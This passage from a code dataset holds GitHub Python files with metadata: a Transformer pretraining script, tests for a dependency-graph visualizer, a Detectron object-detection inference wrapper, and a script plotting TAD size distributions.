"line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.functional.binary_cross_entropy_with_logits", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 102, "usage_type": "name"}]} +{"seq_id": "34831186898", "text": "# -*- coding: utf-8 -*- \n# @Time : 2019-10-29 09:53 \n# @Author : Xiaochuan Zhang\n\n\"\"\"\nPretrain Transformer\n\"\"\"\nfrom networks import Transformer\nimport utils\nfrom loss import cal_translator_performance\nfrom tqdm import trange\nimport os\nimport json\nimport torch\nfrom torch.optim import Adam\nimport torch.nn as nn\nfrom torch.optim.lr_scheduler import LambdaLR\nimport random\nfrom data_manager import DataLoader, Dataset\n\n\ndef train(model, data_iterator, optimizer, scheduler, params):\n model.train()\n scheduler.step()\n\n precision_avg = utils.RunningAverage()\n loss_avg = utils.RunningAverage()\n\n t = trange(params.train_steps, desc=\"Train: \")\n for _ in t:\n # fetch the next training batch\n sources, source_pos, targets, target_pos = next(data_iterator)\n preds = model(sources, source_pos, targets, target_pos)\n\n gold = targets[:, 1:]\n loss, precision = cal_translator_performance(preds, gold)\n if params.n_gpu > 1 and params.multi_gpu:\n loss = loss.mean() # mean() to average on multi-gpu\n\n # clear previous gradients, compute gradients of all variables wrt loss\n model.zero_grad()\n loss.backward()\n\n # gradient clipping\n nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=params.clip_grad)\n\n # performs updates using calculated gradients\n optimizer.step()\n\n loss_avg.update(loss.item())\n precision_avg.update(precision)\n t.set_postfix(loss='{:05.3f}'.format(loss_avg()), precision='{:05.3f}'.format(precision_avg()))\n return loss_avg(), precision_avg()\n\n\ndef evaluate(model, data_iterator, params):\n model.eval()\n\n precision_avg = utils.RunningAverage()\n loss_avg = utils.RunningAverage()\n\n t = trange(params.val_steps, desc=\"Evaluate: \")\n for _ in t:\n # fetch the next evaluation batch\n sources, source_pos, targets, target_pos = next(data_iterator)\n preds = model(sources, source_pos, targets, target_pos)\n\n gold = targets[:, 1:]\n loss, precision = cal_translator_performance(preds, gold)\n\n if params.n_gpu > 1 and params.multi_gpu:\n loss = loss.mean()\n\n loss_avg.update(loss.item())\n precision_avg.update(precision)\n\n t.set_postfix(loss='{:05.3f}'.format(loss_avg()), precision='{:05.3f}'.format(precision_avg()))\n return loss_avg(), precision_avg()\n\n\ndef train_and_evaluate():\n\n # Preparation\n file_path = os.path.realpath(__file__)\n base_dir = os.path.dirname(file_path)\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1,2,3\"\n\n params = utils.Params(os.path.join(base_dir, \"transformer_params.json\"))\n\n params.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n params.n_gpu = torch.cuda.device_count()\n\n # Set the random seed for reproducible experiments\n random.seed(params.seed)\n torch.manual_seed(params.seed)\n if params.n_gpu > 0:\n torch.cuda.manual_seed_all(params.seed) # set random seed for all GPUs\n\n data, n_source_vocab, n_target_vocab = Dataset().load()\n data_loader = DataLoader(data, params.batch_size, require_negative_samples=False, seed=params.seed)\n transformer_model_dir = os.path.join(base_dir, './pretrained_models', 'transformer')\n print(\"max len: \", data_loader.max_len)\n transformer_config = {'n_source_vocab': n_source_vocab,\n 'n_target_vocab': n_target_vocab,\n 'max_len': data_loader.max_len,\n 'd_word_vec': 256,\n 'd_inner': 2048,\n 'n_layers': 6,\n 'n_head': 8,\n 'dropout': 0.1}\n\n transformer = Transformer(n_source_vocab=transformer_config['n_source_vocab'],\n n_target_vocab=transformer_config['n_target_vocab'],\n max_len=transformer_config['max_len'],\n d_word_vec=transformer_config['d_word_vec'],\n d_inner=transformer_config['d_inner'],\n n_layers=transformer_config['n_layers'],\n n_head=transformer_config['n_head'],\n dropout=transformer_config['dropout'])\n\n transformer.to(params.device)\n if params.n_gpu > 1 and params.multi_gpu:\n transformer = torch.nn.DataParallel(transformer)\n\n # Prepare optimizer\n optimizer = Adam(filter(lambda x: x.requires_grad, transformer.parameters()), lr=params.learning_rate,\n betas=(0.9, 0.98), eps=1e-09)\n scheduler = LambdaLR(optimizer, lr_lambda=lambda epoch: 1 / (1 + 0.05 * epoch))\n\n history = {\"train_loss\": [], \"val_loss\": [], \"train_precision\": [], \"val_precision\": []}\n \"\"\"Train the model and evaluate every epoch.\"\"\"\n for epoch in range(1, params.epoch_num + 1):\n print(\"Epoch: \" + str(epoch) + \"/\" + str(params.epoch_num))\n # Compute number of batches in one epoch\n train_size, val_size = data_loader.get_train_and_val_size()\n params.train_steps = train_size // params.batch_size\n params.val_steps = val_size // params.batch_size\n\n # data iterator for training\n train_data_iterator = data_loader.data_iterator(\"train\", shuffle=True)\n val_data_iterator = data_loader.data_iterator(\"val\", shuffle=False)\n\n train_loss, train_precision = train(transformer, train_data_iterator, optimizer, scheduler, params)\n val_loss, val_precision = evaluate(transformer, val_data_iterator, params)\n history[\"train_loss\"].append(train_loss)\n history[\"train_precision\"].append(train_precision)\n history[\"val_loss\"].append(val_loss)\n history[\"val_precision\"].append(val_precision)\n\n # Save weights of the network\n model_to_save = transformer.module if hasattr(transformer, 'module') else transformer # Only save the model it-self\n\n utils.save_checkpoint({'epoch': epoch + 1,\n 'state_dict': model_to_save.state_dict(),\n 'optim_dict': optimizer.state_dict()},\n transformer_config,\n is_best=(val_loss == min(history[\"val_loss\"])),\n checkpoint=transformer_model_dir)\n with open(os.path.join(transformer_model_dir, 'history.json'), 'w') as f:\n json.dump(history, f)\n\n\nif __name__ == '__main__':\n train_and_evaluate()\n", "repo_name": "zhangxiaochuan/MIRROR", "sub_path": "pretrain.py", "file_name": "pretrain.py", "file_ext": "py", "file_size_in_byte": 6496, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 28, "dataset": "github-code", "pt": "61", "api": [{"api_name": "utils.RunningAverage", "line_number": 26, "usage_type": "call"}, {"api_name": "utils.RunningAverage", "line_number": 27, "usage_type": "call"}, {"api_name": "tqdm.trange", "line_number": 29, "usage_type": "call"}, {"api_name": "loss.cal_translator_performance", "line_number": 36, "usage_type": "call"}, {"api_name": "loss.mean", "line_number": 38, "usage_type": "call"}, {"api_name": "loss.backward", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn.utils", "line_number": 45, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "name"}, {"api_name": "loss.item", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.RunningAverage", "line_number": 59, "usage_type": "call"}, {"api_name": "utils.RunningAverage", "line_number": 60, "usage_type": "call"}, {"api_name": "tqdm.trange", "line_number": 62, "usage_type": "call"}, {"api_name": "loss.cal_translator_performance", "line_number": 69, "usage_type": "call"}, {"api_name": "loss.mean", "line_number": 72, "usage_type": "call"}, {"api_name": "loss.item", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 86, "usage_type": "attribute"}, {"api_name": "utils.Params", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 90, "usage_type": "attribute"}, {"api_name": "torch.cuda.device_count", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 91, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed_all", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 97, "usage_type": "attribute"}, {"api_name": "data_manager.Dataset", "line_number": 99, "usage_type": "call"}, {"api_name": "data_manager.DataLoader", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "networks.Transformer", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.nn.DataParallel", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 123, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.LambdaLR", "line_number": 128, "usage_type": "call"}, {"api_name": "utils.save_checkpoint", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 160, "usage_type": "call"}]} +{"seq_id": "37723735760", "text": "import os\nimport qcodes as qc\nfrom autodepgraph.graph import Graph\nfrom autodepgraph import visualization as vis\nfrom unittest import TestCase\nimport autodepgraph as adg\ntest_dir = os.path.join(adg.__path__[0], 'tests', 'test_data')\n\n\nclass Test_visualization(TestCase):\n\n @classmethod\n def setUpClass(self):\n self.fn = os.path.join(test_dir, 'test_graph_states.yaml')\n self.test_graph = Graph('test_graph')\n self.test_graph.load_graph(self.fn, load_node_state=True)\n\n def test_get_node_symbols(self):\n snap = self.test_graph.snapshot()\n sm = vis.get_type_symbol_map(snap)\n\n self.assertEqual(sm['A'], vis.type_symbol_map['normal'])\n self.assertEqual(sm['C'], vis.type_symbol_map['manual_cal'])\n\n def test_get_state_col_map(self):\n snap = self.test_graph.snapshot()\n cm = vis.get_state_col_map(snap)\n\n # the check checks for certain known states in the test graph\n self.assertEqual(cm['A'], vis.state_cmap['good'])\n self.assertEqual(cm['B'], vis.state_cmap['needs calibration'])\n self.assertEqual(cm['C'], vis.state_cmap['active'])\n self.assertEqual(cm['D'], vis.state_cmap['bad'])\n self.assertEqual(cm['E'], vis.state_cmap['unknown'])\n\n def test_snapshot_to_nxGraph(self):\n # ensures that the graph is returned to the state from before this\n # test.\n snap = self.test_graph.snapshot()\n nxG = vis.snapshot_to_nxGraph(snap)\n self.assertEqual(set(nxG.nodes()),\n set(['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']))\n dep_edges = set([('D', 'C'), ('D', 'A'), ('E', 'D'), ('G', 'F'),\n ('C', 'B'), ('B', 'A'), ('G', 'D'), ('H', 'G')])\n self.assertEqual(set(nxG.edges()), dep_edges)\n\n def test_draw_graph_mpl(self):\n # This test only tests if the plotting runs and does not check if\n # it is correct\n snap = self.test_graph.snapshot()\n vis.draw_graph_mpl(snap)\n\n self.test_graph.plot_mode = 'mpl'\n self.test_graph.update_monitor()\n\n def test_graph_changed_correct_plotting(self):\n # This test only tests if the plotting runs and does not check if\n # it is correct\n self.test_graph_2 = Graph('test_graph_2')\n self.test_graph_2.load_graph(self.fn, load_node_state=True)\n snap = self.test_graph_2.snapshot()\n DiGraphWindow = vis.draw_graph_pyqt(snap)\n # Updating and reusing the same plot\n DiGraphWindow = vis.draw_graph_pyqt(snap, DiGraphWindow=DiGraphWindow)\n\n self.test_graph_2.plot_mode = 'pg'\n self.test_graph_2.update_monitor()\n self.assertEqual(self.test_graph_2._graph_changed_since_plot, False)\n nodeJ = self.test_graph_2.add_node('J')\n nodeJ.parents(['G'])\n self.assertEqual(self.test_graph_2._graph_changed_since_plot, True)\n self.test_graph_2.update_monitor()\n nodeJ.remove_parent('G')\n\n def test_draw_graph_pyqt(self):\n # This test only tests if the plotting runs and does not check if\n # it is correct\n self.test_graph.plot_mode = 'pg'\n self.test_graph.update_monitor()\n\n @classmethod\n def tearDownClass(self):\n # finds and closes all qcodes instruments\n all_instrs = (list(qc.Instrument._all_instruments.keys()))\n for insname in all_instrs:\n try:\n qc.Instrument.find_instrument(insname).close()\n except KeyError:\n pass\n", "repo_name": "brianzi/AutoDepGraph", "sub_path": "autodepgraph/tests/test_visualization.py", "file_name": "test_visualization.py", "file_ext": "py", "file_size_in_byte": 3503, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "autodepgraph.__path__", "line_number": 7, "usage_type": "attribute"}, {"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "autodepgraph.graph.Graph", "line_number": 15, "usage_type": "call"}, {"api_name": "autodepgraph.visualization.get_type_symbol_map", "line_number": 20, "usage_type": "call"}, {"api_name": "autodepgraph.visualization", "line_number": 20, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.type_symbol_map", "line_number": 22, "usage_type": "attribute"}, {"api_name": "autodepgraph.visualization", "line_number": 22, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.type_symbol_map", "line_number": 23, "usage_type": "attribute"}, {"api_name": "autodepgraph.visualization", "line_number": 23, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.get_state_col_map", "line_number": 27, "usage_type": "call"}, {"api_name": "autodepgraph.visualization", "line_number": 27, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.state_cmap", "line_number": 30, "usage_type": "attribute"}, {"api_name": "autodepgraph.visualization", "line_number": 30, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.state_cmap", "line_number": 31, "usage_type": "attribute"}, {"api_name": "autodepgraph.visualization", "line_number": 31, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.state_cmap", "line_number": 32, "usage_type": "attribute"}, {"api_name": "autodepgraph.visualization", "line_number": 32, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.state_cmap", "line_number": 33, "usage_type": "attribute"}, {"api_name": "autodepgraph.visualization", "line_number": 33, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.state_cmap", "line_number": 34, "usage_type": "attribute"}, {"api_name": "autodepgraph.visualization", "line_number": 34, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.snapshot_to_nxGraph", "line_number": 40, "usage_type": "call"}, {"api_name": "autodepgraph.visualization", "line_number": 40, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.draw_graph_mpl", "line_number": 51, "usage_type": "call"}, {"api_name": "autodepgraph.visualization", "line_number": 51, "usage_type": "name"}, {"api_name": "autodepgraph.graph.Graph", "line_number": 59, "usage_type": "call"}, {"api_name": "autodepgraph.visualization.draw_graph_pyqt", "line_number": 62, "usage_type": "call"}, {"api_name": "autodepgraph.visualization", "line_number": 62, "usage_type": "name"}, {"api_name": "autodepgraph.visualization.draw_graph_pyqt", "line_number": 64, "usage_type": "call"}, {"api_name": "autodepgraph.visualization", "line_number": 64, "usage_type": "name"}, {"api_name": "qcodes.Instrument._all_instruments.keys", "line_number": 84, "usage_type": "call"}, {"api_name": "qcodes.Instrument", "line_number": 84, "usage_type": "attribute"}, {"api_name": "qcodes.Instrument.find_instrument", "line_number": 87, "usage_type": "call"}, {"api_name": "qcodes.Instrument", "line_number": 87, "usage_type": "attribute"}]} +{"seq_id": "18057519736", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nimport sys\nfrom collections import defaultdict\nimport cv2 # NOQA (Must import before importing caffe2 due to bug in cv2)\nimport glob\nimport logging\nimport os\nimport sys\nimport time\nimport numpy as np\nfrom caffe2.python import workspace\n\nfrom detectron.core.config import assert_and_infer_cfg\nfrom detectron.core.config import cfg\nfrom detectron.core.config import merge_cfg_from_file\nfrom detectron.utils.io import cache_url\nfrom detectron.utils.logging import setup_logging\nfrom detectron.utils.timer import Timer\nimport detectron.core.test_engine as infer_engine\nimport detectron.datasets.dummy_datasets as dummy_datasets\nimport detectron.utils.c2 as c2_utils\nimport detectron.utils.vis as vis_utils\nimport copy\nc2_utils.import_detectron_ops()\n\nworkspace.GlobalInit(['caffe 2', '--caffe2_log_level=0'])\n\ndummy_coco_datasets = dummy_datasets.get_coco_dataset()\n# OpenCL may be enabled by default in OpenCV3; disable it because it's not\n# thread safe and causes unwanted GPU memory allocations.\ncv2.ocl.setUseOpenCL(False)\ndef convert_from_cls_format(cls_boxes, cls_segms, cls_keyps):\n \"\"\"Convert from the class boxes/segms/keyps format generated by the testing\n code.\n \"\"\"\n box_list = [b for b in cls_boxes if len(b) > 0]\n if len(box_list) > 0:\n boxes = np.concatenate(box_list)\n else:\n boxes = None\n if cls_segms is not None:\n segms = [s for slist in cls_segms for s in slist]\n else:\n segms = None\n if cls_keyps is not None:\n keyps = [k for klist in cls_keyps for k in klist]\n else:\n keyps = None\n classes = []\n for j in range(len(cls_boxes)):\n classes += [j] * len(cls_boxes[j])\n return boxes, segms, keyps, classes\n\n\ndef get_class_string(class_index, score, dataset):\n class_text = dataset.classes[class_index] if dataset is not None else \\\n 'id{:d}'.format(class_index)\n return class_text + ' {:0.2f}'.format(score).lstrip('0')\n\n\ndef convert_from_cls_format(cls_boxes, cls_segms, cls_keyps):\n \"\"\"Convert from the class boxes/segms/keyps format generated by the testing\n code.\n \"\"\"\n box_list = [b for b in cls_boxes if len(b) > 0]\n if len(box_list) > 0:\n boxes = np.concatenate(box_list)\n else:\n boxes = None\n if cls_segms is not None:\n segms = [s for slist in cls_segms for s in slist]\n else:\n segms = None\n if cls_keyps is not None:\n keyps = [k for klist in cls_keyps for k in klist]\n else:\n keyps = None\n classes = []\n for j in range(len(cls_boxes)):\n classes += [j] * len(cls_boxes[j])\n return boxes, segms, keyps, classes\n\n# def Convert_bbox_to_json(im_height,im_width,bbox,classes):\n# \"\"\"Convert the result of bbox to json file\"\"\"\n# if bbox is None or classes is None:\n# return None\n# global dummy_coco_datasets\n# if len(bbox) != len(classes):\n# return None\n# all_boxes = []\n# for i in range(len(bbox)):\n# each_box = {}\n# each_box['conf'] = int(bbox[i][-1] * 100)\n# each_box['x'] = bbox[i][0] / im_width\n# each_box['y'] = bbox[i][1] / im_height\n# each_box['width'] = bbox[i][2] / im_width - each_box['x']\n# each_box['height'] = bbox[i][3] / im_height - each_box['y']\n# each_box['name'] = dummy_coco_datasets['classes'][classes[i]]\n# all_boxes.append(each_box)\n# return all_boxes\n\ndef Convert_bbox_to_json(im_height,im_width,bbox,classes):\n \"\"\"Convert the result of bbox to json file\"\"\"\n if bbox is None or classes is None:\n return None\n global dummy_coco_datasets\n if len(bbox) != len(classes):\n return None\n all_boxes = []\n for i in range(len(bbox)):\n each_box = {}\n each_box['conf'] = int(bbox[i][-1] * 100)\n each_box['x'] = bbox[i][0]\n each_box['y'] = bbox[i][1]\n each_box['width'] = bbox[i][2]- each_box['x']\n each_box['height'] = bbox[i][3] - each_box['y']\n each_box['name'] = dummy_coco_datasets['classes'][classes[i]]\n all_boxes.append(each_box)\n return all_boxes\n\ndef visual_all_box(im,boxes,classes):\n \"\"\"rectangle the bbox\"\"\"\n if boxes is None or classes is None:\n return im\n if len(boxes) != len(classes):\n return im\n for i in range(len(boxes)):\n bbox =[int(item) for item in boxes[i][:4]]\n conf = boxes[i][-1]\n if conf < 0.7:\n continue\n category_id = classes[i]\n category_name = str(category_id)\n #category_name = dummy_coco_datasets['classes'][category_id]\n #print (category_name)\n point1 = (bbox[0],bbox[1])\n point2 = (bbox[2],bbox[3])\n #print (point1)\n color_list = [(0,255,0),(0,0,255),(255,255,0),(255,0,255),(0,255,255)]\n color = color_list[i%5]\n im[bbox[1]:bbox[1]+10,bbox[0]:bbox[2]] = color\n cv2.rectangle(im,point1,point2,color,1)\n cv2.putText(im,category_name,(bbox[0],bbox[1]+8),2,0.5,(0,0,0))\n return im\ndef visual_box(im,boxes,classes):\n \"\"\"rectangle the bbox\"\"\"\n if boxes is None or classes is None:\n return im\n if len(boxes) != len(classes):\n return im\n imcopy =copy.deepcopy(im)\n area_no_drew_point1 = (0,0)\n area_no_drew_point2 = (250,1920)\n for i in range(len(boxes)):\n bbox =[int(item) for item in boxes[i][:4]]\n conf = boxes[i][-1]\n category_id = classes[i]\n category_name = dummy_coco_datasets['classes'][category_id]\n #print (category_name)\n point1 = (bbox[0],bbox[1])\n point2 = (bbox[2],bbox[3])\n #print (point1)\n color = (255,0,0)\n category_list = ['person','bicycle','car','bus','truck','motorcycle']\n #color_list = [(0,255,0),(0,0,255),(255,255,0),(0,255,255),(255,0,255),(255,0,0)]\n if category_name in category_list:\n if category_name == 'person':\n color = (228,108,15)\n else:\n color = (225,242,61)\n if conf > 0.8:\n x1 = point1[1]\n y1 = point1[0]\n x2 = point2[1]\n y2 = point2[0]\n im[x1:x2,y1:y1+2] = color\n im[x1:x1+2,y1:y2] = color\n im[x2-2:x2,y1:y2] = color\n im[x1:x2,y2-2:y2] = color\n #cv2.rectangle(im,point1,point2,color,3)\n #im[bbox[1]:bbox[1]+10,bbox[0]:bbox[2]] = color\n #cv2.putText(im,category_name,(bbox[0],bbox[1]+8),2,0.5,(0,0,0))\n #print (category_name)\n #print (point1,point2,area_no_drew_point1,area_no_drew_point2)\n #print ('**********************')\n #print (((x1+x2)/2),((y1+y2)/2))\n if area_no_drew_point1[0] < (x1 + x2)/2 < area_no_drew_point2[0] and area_no_drew_point1[1] < (y1 + y2)/2 < area_no_drew_point2[1]:\n continue\n imcopy[x1:x2,y1:y1+2] = color\n imcopy[x1:x1+2,y1:y2] = color\n imcopy[x2-2:x2,y1:y2] = color\n imcopy[x1:x2,y2-2:y2] = color\n return im,imcopy\n\nclass DetectronInfer():\n def __init__(self,cfgPath,weights,gpu_id,if_visual):\n self.gpu_id = gpu_id\n self.cfgPath = cfgPath\n self.weights = weights\n self.if_visual = if_visual\n merge_cfg_from_file(self.cfgPath)\n assert_and_infer_cfg(cache_urls = False,make_immutable=False)\n self.model = infer_engine.initialize_model_from_cfg(self.weights,gpu_id=self.gpu_id)\n \n def infer(self,im):\n if im is None:\n return None\n im_height = im.shape[0]\n im_width = im.shape[1]\n timers = defaultdict(Timer)\n with c2_utils.NamedCudaScope(self.gpu_id):\n cls_boxes, cls_segms, cls_keyps = infer_engine.im_detect_all(\n self.model, im, None, timers=timers\n )\n boxes, segms, keyps, classes = convert_from_cls_format(cls_boxes,cls_segms,cls_keyps)\n if self.if_visual:\n return visual_all_box(im,boxes,classes),boxes,classes\n else:\n return boxes,classes,segms\n\ndef destroy_all():\n workspace.ResetWorkspace()\n\nif __name__ == \"__main__\":\n weightsPath = '/mnt/hdd2/workspace/zhanghang/dataset/model/e2e_mask_rcnn_R-101-FPN_2x.pkl'\n cfgPath = '/mnt/hdd2/workspace/zhanghang/dataset/model/e2e_mask_rcnn_R-101-FPN_2x.yaml'\n if_visual = False\n\n detector1 = DetectronInfer(cfgPath,weightsPath,gpu_id=1, if_visual=if_visual)\n detector2 = DetectronInfer(cfgPath,weightsPath,gpu_id=2, if_visual= if_visual)\n filename = \"/detectron/demo/15673749081_767a7fa63a_k.jpg\"\n im = cv2.imread(filename)\n\n print (detector1.infer(im))\n print (detector2.infer(im))\n \n\"\"\"\n import threading\n class myThread(threading.Thread):\n def __init__(self,detector,count,thread_id,im):\n threading.Thread.__init__(self)\n self.count = count\n self.detector = detector\n self.thread_id = thread_id\n self.im = im\n def run(self):\n while self.count:\n boxes,classes = self.detector.infer(im)\n print(self.thread_id,boxes[0],classes[0])\n self.count -= 1\n\n thread1 = myThread(detector1,10,1,im)\n thread2 = myThread(detector2,10,2,im)\n \n thread1.start()\n thread2.start()\n thread1.join()\n thread2.join() \n\"\"\"\n\n\n\n", "repo_name": "hzhang33BEI/detectron_infer_coco_mask_bbox", "sub_path": "detector.py", "file_name": "detector.py", "file_ext": "py", "file_size_in_byte": 9545, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "detectron.utils.c2.import_detectron_ops", "line_number": 27, "usage_type": "call"}, {"api_name": "detectron.utils.c2", "line_number": 27, "usage_type": "name"}, {"api_name": "caffe2.python.workspace.GlobalInit", "line_number": 29, "usage_type": "call"}, {"api_name": "caffe2.python.workspace", "line_number": 29, "usage_type": "name"}, {"api_name": "detectron.datasets.dummy_datasets.get_coco_dataset", "line_number": 31, "usage_type": "call"}, {"api_name": "detectron.datasets.dummy_datasets", "line_number": 31, "usage_type": "name"}, {"api_name": "cv2.ocl.setUseOpenCL", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.ocl", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 145, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 146, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 154, "usage_type": "call"}, {"api_name": "detectron.core.config.merge_cfg_from_file", "line_number": 204, "usage_type": "call"}, {"api_name": "detectron.core.config.assert_and_infer_cfg", "line_number": 205, "usage_type": "call"}, {"api_name": "detectron.core.test_engine.initialize_model_from_cfg", "line_number": 206, "usage_type": "call"}, {"api_name": "detectron.core.test_engine", "line_number": 206, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 213, "usage_type": "call"}, {"api_name": "detectron.utils.timer.Timer", "line_number": 213, "usage_type": "argument"}, {"api_name": "detectron.utils.c2.NamedCudaScope", "line_number": 214, "usage_type": "call"}, {"api_name": "detectron.utils.c2", "line_number": 214, "usage_type": "name"}, {"api_name": "detectron.core.test_engine.im_detect_all", "line_number": 215, "usage_type": "call"}, {"api_name": "detectron.core.test_engine", "line_number": 215, "usage_type": "name"}, {"api_name": "caffe2.python.workspace.ResetWorkspace", "line_number": 225, "usage_type": "call"}, {"api_name": "caffe2.python.workspace", "line_number": 225, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 235, "usage_type": "call"}]} +{"seq_id": "6772689976", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\"\"\"\n%prog infile.list [Options]\n \n To plot the sizes distribution of tad.\n Example:\n %prog infile.list\n %prog infile1,infile2,infile3\n %prog infile.list --xlim=\"(100,2000)\"\n\n\"\"\"\n\n\nimport numpy as np\nimport os\nimport os.path as op\nimport pandas as pd\nimport seaborn as sns\nimport sys\n\n\n\ndef import_data(infile):\n df = pd.read_csv(infile, header=None, sep='\\t')\n return df\n\ndef chrom_size_convert(size):\n exts = [\"\", 'kb', 'Mb', 'Gb']\n i = 0\n while size >= 1000:\n size = size // 1000\n i += 1\n return \"{}{}\".format(int(size), exts[i])\n\n\ndef plot_tad_sizes(sizes_dict, xlim=(50, 800)):\n import matplotlib as mpl\n mpl.use('Agg')\n import matplotlib.pyplot as plt\n \n xlim_start, xlim_end = xlim\n plt.figure(figsize=(6,5))\n for species in sizes_dict:\n size = sizes_dict[species]\n sns.distplot(size.values//1000, hist=False, kde=True, \n label=\"{} ({})\".format(species, len(size)), kde_kws={'linewidth':3})\n plt.xticks(np.linspace(xlim_start, xlim_end, 11),\n list(map(int, np.linspace(xlim_start, xlim_end, 11))), rotation=45, ha='center')\n plt.xlim(xlim_start, xlim_end)\n plt.xlabel('TAD Sizes (kb)')\n plt.ylabel('Density')\n\n prefix = \"_\".join(sizes_dict.keys())\n plt.savefig('{}_tad_sizes_distribution.pdf'.format(prefix), dpi=300)\n\n\ndef main(infile_list, xlim):\n if op.exists(infile_list):\n infile_list = [i.strip() for i in open(infile_list) if i.strip()]\n else:\n infile_list = infile_list.split(',')\n\n outprefix_list = list(map(lambda x: x.split(\"_\")[0], infile_list))\n df_list = list(map(import_data, infile_list))\n sizes_list = list(map(lambda x: x[2] - x[1], df_list))\n sizes_dict = dict(zip(outprefix_list, sizes_list))\n \n xlim = eval(xlim)\n plot_tad_sizes(sizes_dict, xlim)\n\nif __name__ == \"__main__\":\n from optparse import OptionParser\n\n p = OptionParser(__doc__)\n p.add_option(\"--xlim\", default=\"(50, 800)\",\n help=\"the xlim of xticks [default: %default]\")\n\n opts, args = p.parse_args()\n \n if len(args) != 1:\n sys.exit(p.print_help())\n infile_list, = args\n \n\n main(infile_list, opts.xlim)\n", "repo_name": "wangyibin/TDGP", "sub_path": "utils/plot_tad_sizes_distribution.py", "file_name": "plot_tad_sizes_distribution.py", "file_ext": "py", "file_size_in_byte": 2267, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.use", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 56, "usage_type": "call"}, 